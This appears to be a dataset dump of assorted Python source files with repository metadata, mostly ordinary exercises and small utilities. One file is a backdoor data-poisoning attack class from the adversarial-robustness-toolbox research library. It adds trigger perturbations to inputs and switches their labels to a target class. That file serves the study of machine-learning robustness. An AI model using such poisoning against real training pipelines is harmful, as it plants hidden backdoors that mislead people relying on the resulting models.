blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
bc40d704453f4394e9649598f8859ae885f09efc | Python | dohy12/coding_test | /수치해석/0927.py | UTF-8 | 673 | 3.4375 | 3 | [] | no_license | # 엡실론 공부
# e**x = 1 + x + (x**2)/2 + (x**3)/3! + (x**4)/4! + ... + x**n/n!
def getEs(n): # n : significant
es = (0.5 * 10**(2-n))
return es
def getApprox(idx, num):
tmp = 0
for i in range(idx+1):
tmp += num**i/math.factorial(i)
return tmp
import math
num = 3
es = getEs(5)
ea = 100
curr_approximation = 1 # 현재 추정치
previous_approximation = 1 # 과거 추정치
idx = 0
while es<ea:
idx +=1
curr_approximation = getApprox(idx, num)
previous_approximation = getApprox(idx-1, num)
ea = (curr_approximation - previous_approximation) / curr_approximation * 100
print(curr_approximation)
print(math.exp(3)) | true |
178a377df2a1430eb317bdba83f455199e3a3a37 | Python | cmmolanos1/holbertonschool-machine_learning | /pipeline/0x02-databases/105-students.py | UTF-8 | 823 | 3.125 | 3 | [] | no_license | #!/usr/bin/env python3
"""Sorting students"""
def top_students(mongo_collection):
"""returns all students sorted by average score.
Args:
mongo_collection: the pymongo collection object.
"""
pipeline = [
{"$unwind": "$topics"},
{"$group": {"_id": "$_id", 'averageScore': {"$avg": "$topics.score"}}},
{"$sort": {'averageScore': -1}}
]
pipeline2 = [
{"$project": {"_id": 1, "name": 1}}
]
averages = mongo_collection.aggregate(pipeline)
names = mongo_collection.aggregate(pipeline2)
averages_list = [avg for avg in averages]
names_list = [name for name in names]
for avg in averages_list:
for name in names_list:
if avg['_id'] == name['_id']:
avg['name'] = name['name']
return averages_list
| true |
fa6793044b4c2c268f444b11aaf9be1afe4381ce | Python | bartelsmanlearnersprofile/bertelsmannlearners | /FlaskAPI/model.py | UTF-8 | 1,380 | 2.828125 | 3 | [] | no_license | from flask_marshmallow import Marshmallow
from flask_sqlalchemy import SQLAlchemy
from marshmallow import fields
db = SQLAlchemy()
ma = Marshmallow()
class Learner(db.Model, dict):
"""
Model class for learners
"""
__tablename__ = 'learners'
id = db.Column(db.Integer, primary_key=True)
slackname = db.Column(db.String(200), nullable=False)
firstname = db.Column(db.String(200), nullable=False)
lastname = db.Column(db.String(200), nullable=False)
def __init__(self, slackname, firstname, lastname):
super().__init__()
self.slackname = slackname
self.firstname = firstname
self.lastname = lastname
# Schema validations
class LearnerSchema(ma.Schema):
class Meta:
model = Learner
id = fields.Integer()
slackname = fields.String(required=True)
firstname = fields.String(required=True)
lastname = fields.String(required=True)
# INFO: How to use the schema
# author = Author(name="Chuck Paluhniuk")
# author_schema = AuthorSchema()
# book = Book(title="Fight Club", author=author)
# session.add(author)
# session.add(book)
# session.commit()
#
# dump_data = author_schema.dump(author)
# print(dump_data)
# {'id': 1, 'name': 'Chuck Paluhniuk', 'books': [1]}
#
# load_data = author_schema.load(dump_data, session=session)
# print(load_data)
# <Author(name='Chuck Paluhniuk')>
learner_schema = LearnerSchema()
| true |
441b40563445e6021b0bfcbb33e72fefde394304 | Python | william881218/adversarial-robustness-toolbox | /art/attacks/poisoning/backdoor_attack.py | UTF-8 | 3,701 | 2.703125 | 3 | [
"MIT"
] | permissive | # MIT License
#
# Copyright (C) The Adversarial Robustness Toolbox (ART) Authors 2020
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module implements Backdoor Attacks to poison data used in ML models.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
from typing import Callable, List, Optional, Tuple, Union
import numpy as np
from art.attacks.attack import PoisoningAttackBlackBox
logger = logging.getLogger(__name__)
class PoisoningAttackBackdoor(PoisoningAttackBlackBox):
"""
Implementation of backdoor attacks introduced in Gu, et. al. 2017
Applies a number of backdoor perturbation functions and switches label to target label
| Paper link: https://arxiv.org/abs/1708.06733
"""
attack_params = PoisoningAttackBlackBox.attack_params + ["perturbation"]
_estimator_requirements = ()
def __init__(self, perturbation: Union[Callable, List[Callable]]) -> None:
"""
Initialize a backdoor poisoning attack.
:param perturbation: A single perturbation function or list of perturbation functions that modify input.
"""
super().__init__()
self.perturbation = perturbation
self._check_params()
def poison(
self, x: np.ndarray, y: Optional[np.ndarray] = None, broadcast=False, **kwargs
) -> Tuple[np.ndarray, np.ndarray]:
"""
Calls perturbation function on input x and returns the perturbed input and poison labels for the data.
:param x: An array with the points that initialize attack points.
:param y: The target labels for the attack.
:param broadcast: whether or not to broadcast single target label
:return: An tuple holding the `(poisoning_examples, poisoning_labels)`.
"""
if y is None:
raise ValueError("Target labels `y` need to be provided for a targeted attack.")
else:
if broadcast:
y_attack = np.broadcast_to(y, (x.shape[0], y.shape[0]))
else:
y_attack = np.copy(y)
num_poison = len(x)
if num_poison == 0:
raise ValueError("Must input at least one poison point.")
poisoned = np.copy(x)
if callable(self.perturbation):
return self.perturbation(poisoned), y_attack
for perturb in self.perturbation:
poisoned = perturb(poisoned)
return poisoned, y_attack
def _check_params(self) -> None:
if not (callable(self.perturbation) or all((callable(perturb) for perturb in self.perturbation))):
raise ValueError("Perturbation must be a function or a list of functions.")
| true |
62749b8b99066f60d789bb52ef30d3de2c030ffd | Python | Vasallius/Python-Journey | /Automate the Boring Stuff With Python/Ch15-Working with PDF and Word Documents/pdf_paranoia_decrypt.py | UTF-8 | 1,402 | 3.125 | 3 | [] | no_license | # PDF Paranoia Decrypt
import os
import PyPDF2
import sys
# Make sure user enters two command line arguments
if len(sys.argv) < 2:
print('Usage: pdf_paranoia_encrypt.py <password>')
sys.exit()
password = sys.argv[1]
# Code for testing if encryption was successful
print('Now testing to decrypt...')
for root, dir, file in os.walk(os.getcwd()):
for filename in file:
# Skip non-encrypted PDFs
if not filename.endswith('_encrypted.pdf'):
continue
# Try to open PDFs
try:
pdfFileObj = open(filename, 'rb')
pdfReader = PyPDF2.PdfFileReader(pdfFileObj)
except:
print(f'{filename} cannot be opened')
if pdfReader.isEncrypted == True:
decryptSuccess = pdfReader.decrypt(password)
if decryptSuccess == True:
print('Password decryption was successful')
pdfWriter = PyPDF2.PdfFileWriter()
for pagenum in range(pdfReader.numPages):
pageobj = pdfReader.getPage(pagenum)
pdfWriter.addPage(pageobj)
decryptedpdf = open(f'{filename[:-14]}.pdf', 'wb')
pdfWriter.write(decryptedpdf)
print(f'{filename[:-14]} created without password')
else:
print('Password decryption was unsuccessful')
else:
pass
| true |
c0db691034b0bde5dd079208d512c889ad4ddca7 | Python | cempionai/0a9db264dffd68c8f8b6e591835c526b | /libraries/BaseMethods.py | UTF-8 | 1,091 | 3.515625 | 4 | [] | no_license | #!/usr/bin/python
# coding=utf-8
# @author: Tadas Krisciunas
import re
class BaseMethods:
""" A class implementing a few methods for inheriting classes.
Should not be used directly, but of course can if need be.
"""
removed = [u'.', u',', u'-', u'!', u'?', u'–', u';', u':',
u'—', u'(', u')', u'\n', u'„', u'“', u'"']
punctuation = [u'.', u',', u'-', u'!', u'?', u'–', u';', u':', u'—', u'(', u')']
@staticmethod
def prepare_sentence(sentence):
""" Prepares sentence for later parsing. """
new_sentence = []
for word in sentence:
word = word.lower()
if len(word) > 1:
for symbol in BaseMethods.removed:
word = word.replace(symbol, '')
if word != '':
new_sentence.append(word)
return new_sentence
@staticmethod
def prepare_text(text):
""" Prepares simple text for parsing:
leaves only lowercase words separated by single spaces.
"""
text = text.lower()
for symbol in BaseMethods.removed:
text.replace(symbol, ' ')
return re.sub(re.compile(r'\s+'), ' ', text)
| true |
04de07a2a1e85cdeb6548b901352b85764152270 | Python | AdrienLemaire/Katas | /prime_factor/.codersdojo/2012-03-27_15-13-42/state_0/prime_factor.py | UTF-8 | 141 | 2.875 | 3 | [] | no_license | # Adapt the code to your code kata prime_factor.
def prime_factor(nb):
return nb
def test_prime_1():
assert prime_factor(1) == 1
| true |
47180a9be11b4a21e481b7f5cb754697344f800e | Python | lerman2003/Python3-Junior | /Lesson2/HomeWork4_(Leson2).py | UTF-8 | 170 | 3.5 | 4 | [] | no_license | S=float(input("Длина пути(в метрах)"))
U=float(input("Скорость(м/с)"))
t=S/U
print("---------")
print("Время(в секундах)",t)
| true |
43abdef0bf5fc0411c7314ae3a337fa66c5ed318 | Python | martintb/typyEnv | /Environment.py | UTF-8 | 2,565 | 2.53125 | 3 | [
"MIT"
] | permissive | from __future__ import print_function
import os
from typyEnv.Path import Path
from typyEnv.PathMod import PathMod
class Environment(object):
def __init__(self):
self.paths={}
self.dev_paths={}
self.lib_mods=[]
self.inc_mods=[]
# right now, this self.paths method doesn't handle adding to the same path twice...
def add_package(self,pkg,export_dev_paths=False):
if pkg.loaded:
print('--> Adding package {} version {} to {}'.format(pkg.name,pkg.version,pkg.modded_paths))
else:
print('==> Error! Package not loaded! Need to call pkg.read()!')
exit(1)
for mod in pkg.path_mods:
self.mod_path(mod)
if export_dev_paths:
if 'libraries' in mod.contains:
print('--> Appending library path {} to LDFLAGS'.format(mod.value))
self.lib_mods.append(PathMod(name='LDFLAGS',action='append',value='-L{}'.format(mod.value)))
if 'headers' in mod.contains:
print('--> Appending header path {} to CPPFLAGS'.format(mod.value))
self.inc_mods.append(PathMod(name='CPPFLAGS',action='append',value='-I{}'.format(mod.value)))
def mod_path(self,mod,action=None,dev=False,sep=':'):
if dev:
paths=self.dev_paths
else:
paths=self.paths
if mod.name not in self.paths:
paths[mod.name] = Path(os.environ.get(mod.name,None),mod.name,sep=sep)
paths[mod.name].modify(mod,action=action)
def remove_package(self,pkg):
if pkg.loaded:
print('--> Removing package {} version {} from {}'.format(pkg.name,pkg.version,pkg.modded_paths))
else:
print('==> Error! Package not loaded! Need to call pkg.read()!')
exit(1)
for mod in pkg.path_mods:
if mod.name not in self.paths:
path = Path(os.environ.get(mod.name,None),mod.name)
self.paths[mod.name] = path
self.paths[mod.name].modify(mod,action='remove')
def export(self,export_dev_paths=False):
variables_str = ''
export_list = ['export']
for name,path in self.paths.items():
variables_str += '{}={};'.format(name,path.join())
export_list.append('{}'.format(name))
dev_str=''
if export_dev_paths:
for mod in self.lib_mods:
self.mod_path(mod,dev=True,sep=' ')
for mod in self.inc_mods:
self.mod_path(mod,dev=True,sep=' ')
for name,path in self.dev_paths.items():
dev_str += '{}=\'{}\';'.format(name,path.join())
export_list.append('{}'.format(name))
export_str = ' '.join(export_list)
export_str += ';'
return dev_str,variables_str,export_str
| true |
0c36cd41877f19065792f9206a25da1d3104ca97 | Python | estraviz/codewars | /7_kyu/Find the Capitals (of a state or country)/python/solution.py | UTF-8 | 289 | 3.96875 | 4 | [] | no_license | # Find the Capitals
def capital(capitals):
output = []
for capital in capitals:
for k, v in capital.items():
if k == 'capital':
c = v
else:
s = v
output.append(f"The capital of {s} is {c}")
return output
| true |
4dc0eac89a811e5b385c6940d46de0f5f9ba9737 | Python | ItsDrike/Mitosis | /cell.py | UTF-8 | 3,065 | 3.546875 | 4 | [] | no_license | import typing as t
from random import randint, choice, uniform
from util import Colors, euclidean_distance
class Cell:
DEACCELERATION_RATE = 0.05
def __init__(
self,
x: float,
y: float,
radius: float,
color: t.Optional[Colors.ColorType] = None,
x_speed: float = 0,
y_speed: float = 0,
) -> None:
self.x = x
self.y = y
self.radius = radius
self.color = color if color else Colors.RANDOM()
self.x_positive = 1 if x_speed > 0 else -1
self.y_positive = 1 if y_speed > 0 else -1
self.x_speed = abs(x_speed)
self.y_speed = abs(y_speed)
def mitosis(
self,
new_color: t.Optional[Colors.ColorType] = None
) -> t.Tuple["Cell", "Cell"]:
"""Handle cell splitting in mitosis process"""
new_radius = self.radius * 0.8
new_color = new_color if new_color else self.color
# Compute speeds so that when vectors are added, result will be 0
x_speed = randint(0, round(self.radius))
y_speed = self.radius - x_speed
x_speed /= 8
y_speed /= 8
x_mult = choice([1, -1])
y_mult = choice([1, -1])
x_speed *= x_mult
y_speed *= y_mult
cell_1 = Cell(self.x, self.y, new_radius, new_color, x_speed, y_speed)
cell_2 = Cell(self.x, self.y, new_radius, new_color, x_speed * -1, y_speed * -1)
return (cell_1, cell_2)
def jiggle(self) -> None:
"""Add a minor jiggling of the cells."""
self.x += uniform(-1.5, 1.5)
self.y += uniform(-1.5, 1.5)
def move(self) -> None:
"""Movement of the cells"""
if self.x_speed < 0:
self.x_speed = 0
if self.y_speed < 0:
self.y_speed = 0
if self.x_speed:
self.x += self.x_speed * self.x_positive
self.x_speed -= self.DEACCELERATION_RATE
if self.y_speed:
self.y += self.y_speed * self.y_positive
self.y_speed -= self.DEACCELERATION_RATE
self.jiggle()
@property
def shape(self) -> t.Tuple[t.Tuple[int, int], int]:
return ((round(self.x), round(self.y)), round(self.radius))
def _overlaps(self, other: "Cell") -> bool:
"""Check if 2 cells overlaps each other"""
distance = euclidean_distance(self.x, self.y, other.x, other.y)
radius_sum = self.radius + other.radius
return distance <= radius_sum
@classmethod
def make_cell(cls, width: int, height: int, cells: t.List["Cell"]) -> "Cell":
"""
This function creates a cell which
doesn't overlap with other cells defined in `cells`.
"""
r = randint(18, 38)
x = randint(r, width - r)
y = randint(r, height - r)
cell = cls(x, y, r)
# Check for overlap
for existing_cell in cells:
if existing_cell._overlaps(cell):
break
else:
return cell
return cls.make_cell(width, height, cells)
| true |
f986af16c4e9ea7f6881a02fb6a950b06ea34faa | Python | shruthigokul/Python | /Python/Activity6.py | UTF-8 | 153 | 3.5625 | 4 | [] | no_license | num=int(input("enter a number within 10"))
for n in range(1,num+1):
for j in range(n):
print(n,end='')
print()
| true |
4c31045bbb403a4f5fc04cdc38793af0812bf494 | Python | hugohadfield/WhistyMcWhistface | /Assorted/jsonTest.py | UTF-8 | 404 | 2.796875 | 3 | [] | no_license |
import json
from pprint import pprint
def doJson(configFileName):
with open(configFileName) as data_file:
jsonFileData = json.load(data_file)
for parameterCollection in jsonFileData["GameParameters"]:
playerConfigName = parameterCollection["PlayerConfigFile"]
print(playerConfigName)
#pprint(jsonFileData)
doJson("GameConfigFile.json") | true |
f5148d66c5a5703e7fc7da100428a6ce3940520c | Python | ohjooyeong/python_algorithm | /InflearnPythonAlgorithm/Section2(Search&Simulation)/2-3.py | UTF-8 | 519 | 3.265625 | 3 | [] | no_license | # 카드 역배치
def reverse(x):
a = [0] * len(x)
for i in range(1, len(x) + 1):
a[-i] = x[i - 1]
return a
arr = list(range(1, 21))
for _ in range(10):
a, b = map(int, input().split())
arr[a-1:b] = reverse(arr[a-1:b])
for i in arr:
print(i, end=' ')
"""
정답지
a = list(range(21))
for _ in range(10):
s, e = map(int, input().split())
for i in range((e - s + 1) // 2):
a[s + i], a[e - i] = a[e - i], a[s + i]
a.pop(0)
for x in a:
print(x, end=' ')
""" | true |
50dec5d4a3f43fb494ed58f495e5a484c4d5a85a | Python | ClaudeMa/pyAirmail | /src/widgets.py | UTF-8 | 2,437 | 3.171875 | 3 | [] | no_license | import Tkinter as tk
from Tkconstants import *
import ttk
import tkMessageBox as tMB
import re
class ValidEntry(ttk.Entry):
"""Creates a ttk.Entry field and accepts a regex string for validation of
user entry. If the entry does not match the regex upon focus moving away from
the widget, an error message will be displayed and focus will remain on the
widget.
"""
def __init__(self, master = None, width = 20, style = None, justify = tk.RIGHT,
validateStr = r'^.*$', validate = 'focusout'):
# controlVariable:
self.cVar = tk.StringVar()
# regex for field validation:
self.validateStr = validateStr
# register validation functions:
self.validateFun = master.register(self.validateEntry)
self.invalidFun = master.register(self.invalidEntry)
ttk.Entry.__init__(self, master, style = style, width = width, justify = justify,
textvariable = self.cVar, validatecommand = self.validateFun,
invalidcommand = self.invalidFun, validate = validate)
def validateEntry(self):
r = re.compile(self.validateStr + '|^$', re.VERBOSE)
if r.match(self.cVar.get()):
return True
else:
return False
def invalidEntry(self):
message = 'Invalid entry: ' + self.cVar.get() + '\nentry must match ' + self.validateStr
tMB.showerror('Invalid entry', message)
self.focus_set()
self.selection_own()
class LabeledEntry(ttk.Frame):
"""Provides a ValidEntry field, prefixed by a text label"""
def __init__(self, master = None, labelText = "Label", entryWidth = None, entryJustify = tk.LEFT,
entryValidateStr = r'^.*$', frameStyle = None, entryStyle = None, labelStyle = None):
"""Calls ttk.Frame contructor and then places a right-aligned label followed
by a left-aligned ValidEntry box inside the frame.
"""
ttk.Frame.__init__(self, master, class_ = "LabeledEntry", style = frameStyle)
self.label = ttk.Label(self, text = labelText, justify=tk.LEFT)
self.label.grid(row = 0, column = 0, sticky = tk.E)
self.entry = ValidEntry(self, width = entryWidth, validateStr = entryValidateStr)
self.entry.grid(row = 0, column = 1, sticky = tk.W)
def set(self, text):
self.entry.cVar.set(text)
def get(self):
return self.entry.cVar.get() | true |
360bda842d07b62e38d0a03aa2a230e89e211e91 | Python | YuanyuanQiu/LeetCode | /0402 Remove K Digits.py | UTF-8 | 420 | 2.828125 | 3 | [] | no_license | def removeKdigits(self, num: str, k: int) -> str:
n = len(num)
if n <= k:
return '0'
stack = ''
for i in range(n):
while k and stack and int(num[i]) < int(stack[-1]):
stack = stack[:-1]
k -= 1
stack += num[i]
# k > 0单调递增,去掉末尾k个数字
if k:
res = stack[:-k]
else:
res = stack
return res.lstrip('0') or '0' | true |
00fecea2f9e6caf93b67fe5ad39e75cf10b4d732 | Python | RyHig/rypytree | /rypytree.py | UTF-8 | 3,469 | 3.328125 | 3 | [] | no_license | import pathlib
import argparse
LINES = '│ '
SPACE = ' '
def create_parser():
parser = argparse.ArgumentParser(
description='a program to list all the files and directories ' +
'in the specified directory. If no directory is specified, ' +
'the current directory will be used.',
prog='rypytree.py')
parser.add_argument('directory', metavar='/path/to/dir')
parser.add_argument('-a', action='store_true',
help='show all files, including dotfiles.')
parser.add_argument('-l',
help='depth or level limit')
return parser
'''
TODO:
if Directory == None.
Save the data into a Dictionary of Dictionaries?
Figure out how to add the tree-like display with the pipes.
Gotta add permission errors. *sigh*
I've got pipes. How do I stop them?
I think creating a list of strings to use as the pipes might be the answer.
arr = [LINES, LINES, LINES, LINES]
If Last item in directory or len(items_in_folder - 1)
arr[n-1] = [SPACES]
Problem with that solution:
the case where the inner directory finishes before the outer directories
├─ DIR:
│ ├─ FILE:
│ ├─ FILE:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ FILE:
│ ├─ DIR:
│ ├─ DIR:
│ ├─ FILE:
│ ├─ FILE:
│ └─ FILE: <---- This will change arr[0] to SPACES
├─ DIR:
└─ FILE: <---- Causing this mess
├─ FILE:
└─ DIR:
├─ DIR: <--- These lines are correct though.
├─ DIR: <--- " " " " "
├─ DIR: <--- " " " " "
└─ DIR: <--- " " " " "
'''
def how_far(directory, hidden, limit=None, n=0, last_line=False):
if n == 0:
print(directory)
if n == limit:
return
elif directory.is_dir():
items_in_folder = [item for item in directory.iterdir()]
for item in range(len(items_in_folder)):
if last_line == True and n == 0:
pass
else:
if (items_in_folder[item].name).startswith('.') and not hidden:
pass
elif item == len(items_in_folder) - 1:
if items_in_folder[item].is_dir():
print('{}{} DIR:{}'.format(LINES*n, "└─", items_in_folder[item].name))
how_far(items_in_folder[item], hidden, limit, n+1, last_line=True)
else:
print('{}{} FILE:{}'.format(LINES*n, "└─", items_in_folder[item].name))
elif items_in_folder[item].is_dir():
print('{}{} DIR:{}'.format(LINES*n, "├─", items_in_folder[item].name))
how_far(items_in_folder[item], hidden, limit, n+1)
else:
print('{}{} FILE:{}'.format(LINES*n, "├─", items_in_folder[item].name))
else:
return None
def limit_or_none(directory, hidden, limit):
if limit == None:
how_far(directory, hidden)
else:
how_far(directory, hidden, int(limit))
if __name__ == "__main__":
parser = create_parser()
args = parser.parse_args()
p = pathlib.Path(args.directory)
limit_or_none(p, args.a, args.l)
| true |
b5be5990d95959e1d81577f9a4eeb7b07d5b6df1 | Python | chenrui890206/pyqt5 | /2.7QObject定时器1.py | UTF-8 | 1,577 | 3.15625 | 3 | [] | no_license | from PyQt5.Qt import *
class MyLabel(QLabel):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setText("10")
self.move(100, 100)
self.setStyleSheet("font-size: 22px;")
def startMyTimer(self, ms):
# 1.开启定时器startTimer(毫秒,Qt.TimerType),返回定时器id,在关闭定时器时用到此id
# Qt.PreciseTimer:精确定时器(尽可能保持毫秒准确)
# Qt.CoarseTimer:粗定时器(5%的误差,默认)
# Qt.VeryCoarseTimer:很粗的定时器(只能到秒级)
self.timer_id = self.startTimer(ms, Qt.CoarseTimer)
# 2.定时器执行的方法
def timerEvent(self, *args, **kwargs):
print("xx")
# 获取当前的标签的内容
current_sec = int(self.text())
current_sec -= 1
self.setText(str(current_sec))
if current_sec == 0:
print("停止")
# 3.杀掉定时器任务(timer_id)
self.killTimer(self.timer_id)
class Window(QWidget):
def __init__(self):
super().__init__()
self.setWindowTitle("QObject的学习")
self.resize(500, 500)
self.setup_ui()
def setup_ui(self):
self.QObject定时器()
def QObject定时器(self):
label = MyLabel(self)
label.setText("10")
label.startMyTimer(1000)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = Window()
# window = QWidget()
window.show()
sys.exit(app.exec_())
| true |
b48b7ecef92fee70f5f9b0519243db5906ef99c1 | Python | hwan1753/Samsung-SW | /D2/Water rate.py | UTF-8 | 342 | 3.140625 | 3 | [] | no_license | T = int(input())
for test_case in range(1,T+1):
i = list(map(int,input().split()))
P, Q, R, S, W = i[0], i[1], i[2], i[3], i[4]
a = P * W
if W <= R:
b = Q
else:
b = Q + (W - R) * S
if a > b:
print("#" + str(test_case)+ " " + str(b))
else:
print("#" + str(test_case)+ " " + str(a))
| true |
5d33decd272a8f4ec871f0cacfc865391e5d97b4 | Python | Cytryn31/PracaMagisterska | /PracaMagisterska/PythonScripts/test.py | UTF-8 | 2,864 | 2.609375 | 3 | [] | no_license | from __future__ import print_function
import matplotlib.pyplot as plt
import numpy as np
from scipy import ndimage as ndi
from skimage import data
from skimage.util import img_as_float
from skimage.filters import gabor_kernel
def compute_feats(image, kernels):
feats = np.zeros((len(kernels), 2), dtype=np.double)
for k, kernel in enumerate(kernels):
filtered = ndi.convolve(image, kernel, mode='wrap')
feats[k, 0] = filtered.mean()
feats[k, 1] = filtered.var()
return feats
def match(feats, ref_feats):
min_error = np.inf
min_i = None
for i in range(ref_feats.shape[0]):
error = np.sum((feats - ref_feats[i, :])**2)
if error < min_error:
min_error = error
min_i = i
return min_i
# prepare filter bank kernels
kernels = []
for theta in range(4):
theta = theta / 4. * np.pi
for sigma in (1, 3):
for frequency in (0.05, 0.25):
kernel = np.real(gabor_kernel(frequency, theta=theta,
sigma_x=sigma, sigma_y=sigma))
kernels.append(kernel)
path = "C:\Users\Ojtek\Documents\PracaMagisterska\PracaMagisterska\PythonScripts\\00110.bmp"
shrink = (slice(0, None, 3), slice(0, None, 3))
brick = img_as_float(data.load(path))[shrink]
image_names = ('brick')
images = (brick)
def power(image, kernel):
# Normalize images for better comparison.
image = (image - image.mean()) / image.std()
return np.sqrt(ndi.convolve(image, np.real(kernel), mode='wrap')**2 +
ndi.convolve(image, np.imag(kernel), mode='wrap')**2)
# Plot a selection of the filter bank kernels and their responses.
results = []
kernel_params = []
for theta in (0, 1):
theta = theta / 4. * np.pi
for frequency in (0.1, 0.4):
kernel = gabor_kernel(frequency, theta=theta)
params = 'theta=%d,\nfrequency=%.2f' % (theta * 180 / np.pi, frequency)
kernel_params.append(params)
# Save kernel and the power image for each image
results.append((kernel, power(brick, kernel)))
fig, axes = plt.subplots(nrows=5, ncols=2, figsize=(5, 6))
plt.gray()
fig.suptitle('Image responses for Gabor filter kernels', fontsize=12)
axes[0][0].axis('off')
# Plot original images
for ax in axes[0][1:]:
ax.imshow(brick)
ax.set_title("brick", fontsize=9)
ax.axis('off')
for label, (kernel, powers), ax_row in zip(kernel_params, results, axes[1:]):
# Plot Gabor kernel
ax = ax_row[0]
ax.imshow(np.real(kernel), interpolation='nearest')
ax.set_ylabel(label, fontsize=7)
ax.set_xticks([])
ax.set_yticks([])
# Plot Gabor responses with the contrast normalized for each filter
vmin = np.min(powers)
vmax = np.max(powers)
for ax in ax_row[1:]:
ax.imshow(powers, vmin=vmin, vmax=vmax)
ax.axis('off')
plt.show() | true |
191b6f9a4ff65963a1100e25fcfa8391906eae14 | Python | alexandraback/datacollection | /solutions_2692487_0/Python/ashwink/A.py | UTF-8 | 1,092 | 3 | 3 | [] | no_license | import sys
f = open(sys.argv[1], 'r')
T = int(f.readline())
for case in range(0, T):
(A, N) = [int(x) for x in f.readline().split()]
motes = [int(x) for x in f.readline().split()]
best = [N for i in range(0, N)]
adds = 0
motes.sort()
#print "motes: %s" % motes
for (i, mote) in enumerate(motes):
#print "A: %d" % A
#print "mote: %d" % mote
if A > mote:
A += mote
best[i] = adds + N - i - 1
else:
if A == 1:
best[i] = N - i
break
# option1: drop everything including this mote
option1 = adds + N - i
# option2: add motes to raise A above this mote
# then drop everything else
while A <= mote:
A += A - 1
adds += 1
A += mote
option2 = adds + N - i - 1
best[i] = min(option1, option2)
#print "adds: %d" % adds
#print "best: %s" % best
print "Case #%d: %d" % (case + 1, min(best))
sys.stdout.flush()
| true |
98bb2be061ebc70784a5aea386d57604cd4a0fa5 | Python | metulburr/morse_code | /main.py | UTF-8 | 1,930 | 3.46875 | 3 | [] | no_license |
import pygame
import os
import time
pygame.mixer.init()
char_time = .75
word_time = 1.5
sound = pygame.mixer.Sound('beep.wav')
def longbeep():
len = .75
sound.play()
time.sleep(len)
sound.stop()
def shortbeep():
len = .25
sound.play()
time.sleep(len)
sound.stop()
dot = lambda:shortbeep()
dash = lambda:longbeep()
morse_code = {
'a':[dot, dash],
'b':[dash, dot, dot, dot],
'c':[dash, dot, dash, dot],
'd':[dash, dot, dot],
'e':[dot],
'f':[dot, dot, dash, dot],
'g':[dash, dash, dot],
'h':[dot, dot, dot, dot],
'i':[dot, dot],
'j':[dot, dash, dash, dash],
'k':[dash, dot, dash],
'l':[dot, dash, dot, dot],
'm':[dash, dash],
'n':[dash, dot],
'o':[dash, dash, dash],
'p':[dot, dash, dash, dot],
'q':[dash, dash, dot, dash],
'r':[dot, dash, dot],
's':[dot, dot, dot],
't':[dash],
'u':[dot, dot, dash],
'v':[dot, dot, dot, dash],
'w':[dot, dash, dash],
'x':[dash, dot, dot, dash],
'y':[dash, dot, dash, dash],
'z':[dash, dash, dot, dot],
'1':[dot, dash, dash, dash, dash],
'2':[dot, dot, dash, dash, dash],
'3':[dot, dot, dot, dash, dash],
'4':[dot, dot, dot, dot, dash],
'5':[dot, dot, dot, dot, dot],
'6':[dash, dot, dot, dot, dot],
'7':[dash, dash, dot, dot, dot],
'8':[dash, dash, dash, dot, dot],
'9':[dash, dash, dash, dash, dot],
'0':[dash, dash, dash, dash, dash]
}
user = input('Convert this to morse code: ')
for char in user:
char = char.lower()
if char == ' ':
time.sleep(word_time) #space between words
continue
try:
if morse_code[char]:
#print(char)
for ch in morse_code[char]:
ch()
time.sleep(.25) #space between dots and dashs in one char
time.sleep(char_time) #space between chars
except KeyError:
pass
| true |
873751af3f94d74442f520b83396d9ceb2d5d108 | Python | milenpenev/Python_Advanced | /Exam preparation/Python Advanced Retake Exam - 14 April 2021/03-flights.py | UTF-8 | 552 | 3.15625 | 3 | [
"MIT"
] | permissive | def flights(*kwargs):
for key in range(0, len(kwargs), 2):
if kwargs[key] == "Finish":
break
else:
destination = kwargs[key]
passengers = kwargs[key + 1]
if destination not in completed_flights:
completed_flights[destination] = passengers
continue
completed_flights[destination] += passengers
return completed_flights
completed_flights = {}
print(flights('Vienna', 256, 'Vienna', 26, 'Morocco', 98, 'Paris', 115, 'Finish', 'Paris', 15)) | true |
9aa86dc3d4db4d669cef58680c773a7f70faa8f8 | Python | Rainer-Kempkes/IP518bb_QuizGenerator | /src/Sentence/get_subject_word_from_dependency_tree.py | UTF-8 | 539 | 3.125 | 3 | [
"MIT"
] | permissive | from pprint import pprint
def get_subject_word_from_dependency_tree(tree, tokens):
"""
Returns the word which can be considered the subject of a sentence
:param tree:
:param tokens:
:return:
"""
# Find root node
root = None
for node in tree:
if node[0] == 'ROOT':
root = node
break
# Find first attached nsubj
for node in tree:
if (node[0] == 'nsubj' or node[0] == 'name') and node[1] == root[2]:
return tokens[node[2] - 1]
return None | true |
1940e537b388606dea03a667b26681a5f3901666 | Python | MichalLinek/inteview-questions | /leetcode/sequential-digits/solution.py | UTF-8 | 386 | 2.984375 | 3 | [] | no_license | class Solution:
def sequentialDigits(self, low: int, high: int) -> List[int]:
output = []
for i in range(1, 10):
for j in range(1, 10 - i + 1):
num = 0
for k in range(i):
num = num * 10 + k + j
if low <= num <= high:
output.append(num)
return output | true |
